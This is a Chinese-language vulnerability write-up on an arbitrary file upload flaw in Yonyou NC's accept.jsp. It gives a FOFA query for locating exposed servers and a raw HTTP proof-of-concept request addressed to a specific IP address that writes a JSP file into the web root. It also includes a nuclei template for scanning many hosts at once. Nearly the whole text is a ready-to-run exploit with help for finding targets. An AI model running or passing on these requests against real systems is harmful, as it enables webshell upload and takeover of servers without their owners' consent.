漏洞简介
用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
漏洞复现
fofa语法:app="用友-UFIDA-NC"
登录页面如下:
POC
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: 106.14.160.167:8090
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="2XOSxplUo2EnwilSNJazJYZxZUc.txt"
Content-Type: text/plain
<% out.println("2XOSxnJbIM7VyX60FJvryCft1X5"); %>
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"
\webapps\nc_web\2XOSxnFIgjeaGE7MQmmZiv3Imfw.jsp
-----------------------------16314487820932200903769468567--
访问上传后的文件
nuclei批量yaml文件
id: yonyou_NC_accept_fileupload
info:
name: YonYou NC Accept Upload - Arbitray File Upload
author: SleepingBag945
severity: critical
description: |
Arbitrary file upload vulnerability in UFIDA N C accept.jsp . An attacker can obtain website permissions through the vulnerability.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
- https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="1085941792"
tags: yonyou,nc,intrusive,fileupload
http:
- raw:
- |
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Accept-Encoding: gzip
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt"
Content-Type: text/plain
<% out.println("{{randstr_2}}"); %>
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"
\webapps\nc_web\{{randstr_3}}.jsp
-----------------------------16314487820932200903769468567--
- |
GET /{{randstr_3}}.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and
# digest: 4a0a00473045022100abd01a38d228d42edb7cc9812400c533448e2af7e70d3cabae409884e5564d1b022039588d8a867cec38f95254eec1efcf1efbe40ee9d7b1c4e627b5b0de8473cace:922c64590222798bb761d5b6d8e72950